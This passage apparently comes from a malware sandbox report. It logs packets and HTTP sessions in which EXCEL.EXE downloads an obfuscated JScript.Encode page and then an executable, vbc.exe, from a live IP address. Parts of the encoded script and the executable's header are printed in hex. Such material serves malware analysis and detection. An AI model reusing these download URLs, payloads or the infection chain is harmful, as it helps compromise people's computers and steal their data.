                                                                                                                                                                                            Jun 28, 2022 10:46:38.234168053 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234174967 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234190941 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234215021 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234232903 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234241009 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234261036 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234273911 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234278917 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234297037 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234306097 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234313965 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234332085 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234350920 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234373093 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234374046 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234389067 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234405041 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234405041 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234421968 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234440088 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234440088 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234457970 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234471083 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234474897 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234493017 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234508038 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234512091 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234527111 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234544039 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.234586954 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348176003 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348217010 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348242044 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348244905 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348264933 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348285913 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348288059 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348311901 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348335981 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348335981 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348357916 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348380089 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348381042 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348402977 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348426104 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348428011 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348448038 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348453999 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348469973 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348503113 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348505020 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348529100 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348551989 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348563910 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348572969 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348593950 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348594904 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348615885 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348615885 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348639011 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348661900 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348664045 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348685026 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348707914 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348710060 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348732948 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348741055 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348754883 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348773003 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348773956 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348795891 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.348849058 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:43.270066023 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:43.270215034 CEST4978380192.168.2.4172.245.119.48

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • 172.245.119.48

                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            0192.168.2.449773172.245.119.4880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Jun 28, 2022 10:45:23.452174902 CEST1378OUTGET /shipping_invc/document.html HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                            Host: 172.245.119.48
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572532892 CEST1379INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Tue, 28 Jun 2022 08:45:23 GMT
                                                                                                                                                                                            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                                                                                                                            Last-Modified: Mon, 27 Jun 2022 11:16:27 GMT
                                                                                                                                                                                            ETag: "54ed-5e26c0d18ab3c"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 21741
                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 79 50 45 20 68 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 4c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 63 52 69 70 54 20 0b 54 79 50 45 3d 22 54 65 78 74 2f 6a 73 43 52 69 70 74 2e 45 6e 63 6f 64 65 22 3e 0d 0a 0d 0a 2f 2f 2a 2a 73 54 41 72 54 20 65 6e 63 6f 64 65 2a 2a 0d 0a 0d 0a 23 40 7e 5e 53 31 51 41 41 41 3d 3d 40 23 40 26 40 23 40 26 5e 57 31 6c 59 62 57 09 20 74 4d 2b 57 50 7b 50 45 5c 6b 4f 48 72 7e 50 33 50 4a 55 39 50 29 72 50 2c 5f 7e 4a 26 72 39 4a 7e 50 33 7e 4a 2c 4a 7e 51 2c 4a 77 5e 09 39 6b 29 4d 67 36 72 50 7e 33 50 72 2f 4b 26 6d 72 7e 50 33 50 45 50 72 50 51 7e 72 4f 2f 30 72 4a 2c 50 5f 2c 45 4b 4a 2c 50 33 50 45 50 45 7e 33 50 45 73 7d 2e 4a 2c 50 51 7e 72 5a 32 45 7e 2c 5f 7e 4a 2c 45 2c 5f 7e 72 7a 68 62 44 72 50 2c 51 50 72 62 5c 4a 2c 50 51 7e 72 50 4a 2c 51 50 72 2d 4a 72 7e 51 50 72 71 44 7b 2e 32 45 7e 2c 5f 7e 4a 7e 2e 57 53 3f 6e 57 4b 4a 50 7e 51 2c 4a 2e 73 26 4a 7f 27 45 2c 50 33 50 4a 5b 62 26 50 4a 2c 5f 7e 4a 2c 4a 7e 51 2c 4a 71 3a 6d 53 6d 45 78 31 34 5c 2b 44 74 4b 4e 78 5a 47 55 44 2b 45 50 2c 51 50 72 36 4f 5c 72 50 50 51 7e 72 2b 55 45 72 7e 2c 5f 7e 72 50 72 50 5f 2c 4a 26 50 7b 7e 4a 7e 50 33 50 45 2e 4b 68 2f 7f 6f 57 4d 73 6b 5e 45 7e 50 33 50 72 2b 45 50 7e 51 2c 4a 78 4a 2c 7e 5f 2c 4a 2a 7a 44 5e 60 45 7e 33 50 45 71 41 61 76 5e 63 26 32 6f 60 42 5d 3f 48 64 4b 41 3a 20 4b 41 36 4f 20 7f 31 5a 4b 5b 71 09 6f 54 45 51 2c 5a 5f 6c 4d 54 58 25 51 2c 3b 43 29 44 59 58 25 33 42 69 50 77 25 52 21 6e 3a 3f 4f 49 26 55 54 60 2c 55 35 6b 59 32 73 52 31 36 31 37 2b 5d 4b 59 42 51 2c 3b 74 6c 4d 44 2a 52 5f 24 31 75 29 49 59 2a 52 5f 76 73 5d 36 74 41 29 2f 41 7f 63 6b 59 5d 72 67 6f 60 76 51 5d 6d 75 6c 22 44 32 63 51 45 6a 38 49 5c 31 5a 38 41 6d 30 2c 25 7d 6a 31 50 28 3b 46 4d 28 66 39 47 7d 3f 7a 4f 38 33 77 59 5c 3f 29 78 38 70 67 33 5b 5a 31 7b 39 77 4e 43 28 47 21 6f 65 09 22 33 4a 2e 22 58 31 32 69 54 53 71 46 73 28 7f 78 73 6d 73 49 6f 7d 73 56 3b 6a 6f 49 39 3a 54 63 54 39 46 44 33 38 4d 58 39 28 28 24 5c 5e 55 35 57 28 78 6a 7a 4b 41 46 2d 50 62 2a 33 38 33 53 6b 4a 5a 7e 39 6d 4d 6f 48 6a 79 2e 21 26 66 5a 4c 70 79 74 34 6d 5e 31 73 5b 3b 2a 2e 28 68 56 4e 34 20 22 73 46 2e 38 68 39 7f 42 2f 43 09 74 6f 5e 26 22 34 4e 56 56 25 28 56 2e 63 5b 21 6a 58 38 6b 7e 42 28 78 5d 35 4e 5f 71 6f 6a 2e 78 5c 49 56 2c 66 34 73 36 2d 65 71 49 6a 28 54 7d 61 34 4d 60 47 6a 7f 6c 21 60 43 5d 58 28 33 44 28 50 5a 58 22 4e 5f 39 32 38 73 6d 6f 5e 33 6b 2f 5e 26 22 7a 6d 7f 58 09 71 56 77 21 22 58 58 71 6c 71 2a 54 71 41 2e 66 4a 41 56 45 39 6f 41 5a 6d 6b 7e 7f 65 3a 31 77 7d 58 5e 6f 4a 69 6c 74 38 7f 60 4c 71 5e 73 70 65 62 71 6f 4a 69 6c 74 50 7f 6a 50 60 4d 6f 4e 7d 55 41 59 31 58 7a 4f 6a 56 73 22 6d 38 49 47 5e 09 6a 47 26 2f 49 6f 7f 4c 4b 7f 23 2e 78 48 22 4d 31 26 38 68 58 5c 65 7f 22 69 34 5a 7d 32 38 56 6a 57 5c 2f 53 6b 43 43 22 54 31 66 47 37 53 2e 32 26 74 6b 57 7a 31 47 6a 3b 48 3a 32 58 4a 4e 70 63 64 22 6f 32 48 5a 4f 2b 65 3a 74 45 5c 28 34 56 28 72 53 6b 42 4d 6a 36 4e 4e 77 7d 23 60 39 48 6a 69 67 6d 5b 3a 78 25 64 3a 23 57 7d 55 71 2f 74 5a 53
                                                                                                                                                                                            Data Ascii: <!DOCTyPE hTML><hTmL><bODy><scRipT TyPE="Text/jsCRipt.Encode">//**sTArT encode**#@~^S1QAAA==@#@&@#@&^W1lYbW tM+WP{PE\kOHr~P3PJU9P)rP,_~J&r9J~P3~J,J~Q,Jw^9k)Mg6rP~3Pr/K&mr~P3PEPrPQ~rO/0rJ,P_,EKJ,P3PEPE~3PEs}.J,PQ~rZ2E~,_~J,E,_~rzhbDrP,QPrb\J,PQ~rPJ,QPr-Jr~QPrqD{.2E~,_~J~.WS?nWKJP~Q,J.s&J'E,P3PJ[b&PJ,_~J,J~Q,Jq:mSmEx14\+DtKNxZGUD+EP,QPr6O\rPPQ~r+UEr~,_~rPrP_,J&P{~J~P3PE.Kh/oWMsk^E~P3Pr+EP~Q,JxJ,~_,J*zD^`E~3PEqAav^c&2o`B]?HdKA: KA6O 1ZK[qoTEQ,Z_lMTX%Q,;C)DYX%3BiPw%R!n:?OI&UT`,U5kY2sR1617+]KYBQ,;tlMD*R_$1u)IY*R_vs]6tA)/AckY]rgo`vQ]mul"D2cQEj8I\1Z8Am0,%}j1P(;FM(f9G}?zO83wY\?)x8pg3[Z1{9wNC(G!oe"3J."X12iTSqFs(xsmsIo}sV;joI9:TcT9FD38MX9(($\^U5W(xjzKAF-Pb*383SkJZ~9mMoHjy.!&fZLpyt4m^1s[;*.(hVN4 "sF.8h9B/Cto^&"4NVV%(V.c[!jX8k~B(x]5N_qoj.x\IV,f4s6-eqIj(T}a4M`Gjl!`C]X(3D(PZX"N_928smo^3k/^&"zmXqVw!"XXqlq*TqA.fJAVE9oAZmk~e:1w}X^oJilt8`Lq^spebqoJiltPjP`MoN}UAY1XzOjVs"m8IG^jG&/IoLK#.xH"M1&8hX\e"i4Z}28VjW\/SkCC"T1fG7S.2&tkWz1Gj;H:2XJNpcd"o2HZO+e:tE\(4V(rSkBMj6NNw}#`9Hjigm[:x%d:#W}Uq/tZS
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572566032 CEST1381INData Raw: 41 7c 3a 59 22 4e 41 73 7a 23 3b 46 79 3a 21 2e 77 6a 5a 54 22 46 4b 44 58 6a 7f 58 33 38 33 53 79 5c 6b 6c 73 7f 41 6a 4c 6e 73 56 68 74 68 58 33 5e 6b 6c 56 28 4d 41 6b 6a 73 2c 46 39 4d 6a 69 6c 56 2e 39 35 71 36 64 28 3b 71 33 22 09 2a 79 72
                                                                                                                                                                                            Data Ascii: A|:Y"NAsz#;Fy:!.wjZT"FKDXjX383Sy\klsAjLnsVhthX3^klV(MAkjs,F9MjilV.95q6d(;q3"*yrV~#}3X95Fa ehtEt(4sqNYP[V,pJ#~X8 go`&\TS`}n1:goq;F;5qFo(;Ny\!V4} lG8&g!xhx'vQ]mubMD&W_vb*B#bb*+EP,Q,J%rP,_Przc zcR&Rcz JRRJ RJRRJ zcRJJ~PQ~rR zcEP,_~EczR &rPQP
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572590113 CEST1382INData Raw: 6b 61 4e 28 39 58 34 55 6d 7a 2e 4b 55 66 33 79 78 74 35 7b 52 44 57 7e 21 6f 21 70 53 78 38 64 2e 60 6e 34 4e 09 4d 09 29 77 49 24 3b 22 5d 6b 53 53 46 69 39 28 66 34 5e 58 26 58 46 26 5e 24 28 09 4b 2f 61 33 2c 3b 2c 77 70 2b 41 44 21 59 55 7d
                                                                                                                                                                                            Data Ascii: kaN(9X4Umz.KUf3yxt5{RDW~!o!pSx8d.`n4NM)wI$;"]kSSFi9(f4^X&XF&^$(K/a3,;,wp+AD!YU}BtGf;^eLHt*dV%GA.`!(qHdx0!pzrIOJU6}Lu\OAWSlqhj%Z\7;tHl1JI;!2s&1Ap^2\~FHAn}~i2XG;m1+pO8&%C9y[2~C[o_DIJrIN(_1Mw2oEO(jyAqpv\Y1qW1zu.%9TGD7:FW+K|bN_F"\B^Uv6LV]SV;P
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572613955 CEST1383INData Raw: 68 4f 4d 36 75 49 39 70 73 68 4b 31 2e 64 2a 5f 3b 58 21 5c 64 56 30 20 2d 4c 79 7c 78 2b 3b 2e 4f 34 46 39 5e 47 4c 34 2a 34 6a 7d 2c 7a 6a 7d 36 32 70 5f 31 57 21 7d 2f 24 31 43 77 2f 54 57 45 2d 66 49 5c 52 5a 2d 22 35 7a 4c 7c 56 2a 58 32 4b
                                                                                                                                                                                            Data Ascii: hOM6uI9pshK1.d*_;X!\dV0 -Ly|x+;.O4F9^GL4*4j},zj}62p_1W!}/$1Cw/TWE-fI\RZ-"5zL|V*X2K0pJrsMuilwn7it0Mml#}FgrDm;c0!zFJoZP11srzAl}1WoZqFk0(K$U%9+n:szw.0CtNt+faf|aUL4Zm3ewob6!8H/FF4\jl4s}3h06rL2):cKhk.~HC2Ejp6GW~q97E5hk}j[qVxWf/o;Fh+K1:0V\ss}A`\*
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572635889 CEST1385INData Raw: 7f 3a 4e 71 61 38 34 46 2b 78 64 56 33 5b 64 77 3a 48 30 55 45 6e 6f 2b 6b 76 2a 45 6c 30 2a 66 60 41 34 49 22 20 41 4d 73 56 56 7d 45 79 72 24 5c 65 70 21 33 32 2f 6f 6d 77 70 5c 21 33 6f 4a 56 26 6e 2e 41 71 4c 64 76 4e 42 4e 36 2a 4b 79 47 28
                                                                                                                                                                                            Data Ascii: :Nqa84F+xdV3[dw:H0UEno+kv*El0*f`A4I" AMsVV}Eyr$\ep!32/omwp\!3oJV&n.AqLdvNBN6*KyG(FKN$[kZk3jA(ejNc&$N956g[*,D%T*"jzHK&jW;)5tb54D4}sqIrNMrd:nDSn(/TVRnYK|6F\w4dSvcj$|bVEK8j%jmg3dA5fHXK:^AVR0C"GIKzWAX{(DBxj8ablN?d(`ppqb5LdwVtn(/Ni10,|sO5GF&RbPL
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572658062 CEST1386INData Raw: 55 3b 5a 56 33 4a 67 71 68 6a 65 6f 32 64 33 4d 72 56 4d 50 39 6a 24 41 48 79 53 71 7b 4c 28 46 2a 6f 5c 2f 09 09 4e 6f 6a 5e 56 28 68 2b 39 22 33 7a 39 30 7d 74 32 7b 53 6e 73 71 3f 34 6b 49 32 4d 7a 76 25 24 4b 76 62 2d 4c 5c 3a 29 5c 6c 73 44
                                                                                                                                                                                            Data Ascii: U;ZV3Jgqhjeo2d3MrVMP9j$AHySq{L(F*o\/Noj^V(h+9"3z90}t2{Snsq?4kI2Mzv%$Kvb-L\:)\lsD 9~pApj2 F3m_y1Kl4Hs5ZFK[x$w1:\OLyFFNVW)#`X.c.q29(qWd0*J;d,q?wqDo\mwwVSMr^9DkZi?2 )un%H"VrAb\WGUbnpXW%*qF.TK&8FCJ+~s\TPl4WlmVjI{l\OpZ4+4Jk9EHD4nBTtV7Flhf:.aw
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572679996 CEST1388INData Raw: 6a 41 57 58 5a 7e 34 53 09 7d 36 29 5a 2a 49 28 2d 7f 63 73 3a 28 71 61 47 42 37 2c 3b 63 78 78 2b 46 56 4b 6e 68 7f 7c 22 59 09 28 5a 63 74 5a 7d 4d 53 46 70 68 42 72 62 6c 2f 6a 6d 36 25 5c 21 5a 5c 6a 5c 60 28 2a 53 45 4f 7a 6f 2b 72 5e 50 3a
                                                                                                                                                                                            Data Ascii: jAWXZ~4S}6)Z*I(-cs:(qaGB7,;cxx+FVKnh|"Y(ZctZ}MSFphBrbl/jm6%\!Z\j\`(*SEOzo+r^P:q*hMA$t^%:+6V}25p.\}m3q[hj}y\p6|v1A0F2M55PM-."&Gk(+6}]L}2M)\Vl$kxF`ntsW95*wr&*y"}0s55L#V(.!Vb\ 90G%&/Tjj1Psp6:S-C~WuK*9$2&AF|;KZj6+?7&KqHWWnjr4N;(s0K.LD.:S
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572701931 CEST1389INData Raw: 41 6f 6f 47 62 50 5c 6f 77 24 31 77 55 53 6c 78 33 2d 4b 72 6e 55 5c 31 31 21 21 30 66 7e 35 4b 3a 63 73 71 73 5c 63 67 7d 25 26 63 7d 63 58 79 4a 5b 49 34 4b 71 75 3f 79 6d 44 35 21 2e 6b 78 28 6f 48 5b 63 57 71 73 35 56 7f 5f 24 30 60 72 54 7a
                                                                                                                                                                                            Data Ascii: AooGbP\ow$1wUSlx3-KrnU\11!!0f~5K:csqs\cg}%&c}cXyJ[I4Kqu?ymD5!.kx(oH[cWqs5V_$0`rTz6X93tU.2nxMZ!S;Io4?!Vna.{ .Z%F7,hiVxqn2^*CG%k&K*p47py53cb5f1+Wr0\oX]+x5}fb50AS+!.](^oC0XmUH4tz}\8+\NGs|1AFKKBnw!GXS$V.5nrdAEs"lyJ!.eWDW+yT3.yh$s:g;*s+jzu.
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572726965 CEST1390INData Raw: 5a 6a 68 22 73 57 43 26 73 70 34 42 23 52 21 32 5c 7a 28 2a 7a 4c 54 4f 38 4b 26 24 7f 36 6e 5e 30 5c 58 31 57 22 6a 2e 61 76 58 38 44 6f 48 58 09 74 28 5a 67 31 33 55 7f 7f 2a 5c 74 31 2e 6f 44 30 42 34 32 7f 77 62 74 2a 72 47 6f 6c 6c 32 56 7e
                                                                                                                                                                                            Data Ascii: Zjh"sWC&sp4B#R!2\z(*zLTO8K&$6n^0\X1W"j.avX8DoHXt(Zg13U*\t1.oD0B42wbt*rGoll2V~VsWw(KUqA"9tL5Tiz:)s99c\\X!)W1sWGofVG?1nB*2!yW-LN/bpU}3u;0B%IkyL(b0L#1}}f(:.MHi99a/H6Kl83+V*6k-KN525qY2nOXmmo+"SU2NjpqI8Vxkr52xhT/NMaY;}7w$t::(oN_O&j5%
                                                                                                                                                                                            Jun 28, 2022 10:45:23.574032068 CEST1392INData Raw: 5c 41 7a 21 39 32 45 62 2f 25 20 28 79 7e 70 69 6e 7a 30 77 6c 21 76 3b 6a 57 77 34 7a 28 44 7d 30 72 36 57 72 2a 20 6e 46 64 62 4a 26 74 28 4c 5a 53 4d 4d 35 66 38 63 61 68 53 53 4b 2b 6f 2a 56 7d 70 4d 79 6a 6f 31 72 50 36 74 21 56 59 61 48 2b
                                                                                                                                                                                            Data Ascii: \Az!92Eb/% (y~pinz0wl!v;jWw4z(D}0r6Wr* nFdbJ&t(LZSMM5f8cahSSK+o*V}pMyjo1rP6t!VYaH+3zMaD"9&!ITpOEs0nbvO+A\2t29C2:\~SnH/}6!&:&B$I0,kfmRotaBa+DLz/O\!.`tHn&0DkS5K`F.T++!mW8R*4a|REr~cah/Tv51"K{8^NSHU|z Z(oj|5IzmpHdo`%U!8]jh}4)Obo04Us}Zl($m/+c+r;At
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689332962 CEST1393INData Raw: 7a 58 70 5e 37 6a 3b 6e 2a 3f 48 47 49 55 7a 7d 46 6a 6c 55 49 64 44 56 09 4f 77 25 62 6d 70 3a 31 2b 48 4b 54 5c 4b 57 69 57 34 64 53 77 2a 31 44 4c 6c 59 74 3f 5a 5c 7f 6d 7f 47 5f 6e 57 35 44 47 31 38 55 35 3a 41 7d 48 35 4d 6c 5f 25 7d 2c 34
                                                                                                                                                                                            Data Ascii: zXp^7j;n*?HGIUz}FjlUIdDVOw%bmp:1+HKT\KWiW4dSw*1DLlYt?Z\mG_nW5DG18U5:A}H5Ml_%},4qUAef8/_D\vx.H_j}^8FVA1`X4h;aNZ%04whNw}8;"E1%2645z!jbzmKlZ6G]M!Xqo-pdWlY"cDC3j+#rT,y])!pF,nBU+K`;!o7F`3AsE),DL68dGCyTjg|5$i4NgD7Au3U1A5S(Afq1da7}1}soZTfDH2jz(


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                            1192.168.2.449783172.245.119.4880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                            Jun 28, 2022 10:46:37.635595083 CEST11717OUTGET /870/vbc.exe HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                            Host: 172.245.119.48
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757875919 CEST11719INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Tue, 28 Jun 2022 08:46:37 GMT
                                                                                                                                                                                            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                                                                                                                            Last-Modified: Tue, 28 Jun 2022 02:41:13 GMT
                                                                                                                                                                                            ETag: "6d600-5e278f84f0321"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 448000
                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 4d ba 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ce 06 00 00 06 00 00 00 00 00 00 92 ec 06 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ec 06 00 4f 00 00 00 00 00 07 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 cc 06 00 00 20 00 00 00 ce 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 03 00 00 00 00 07 00 00 04 00 00 00 d0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 07 00 00 02 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 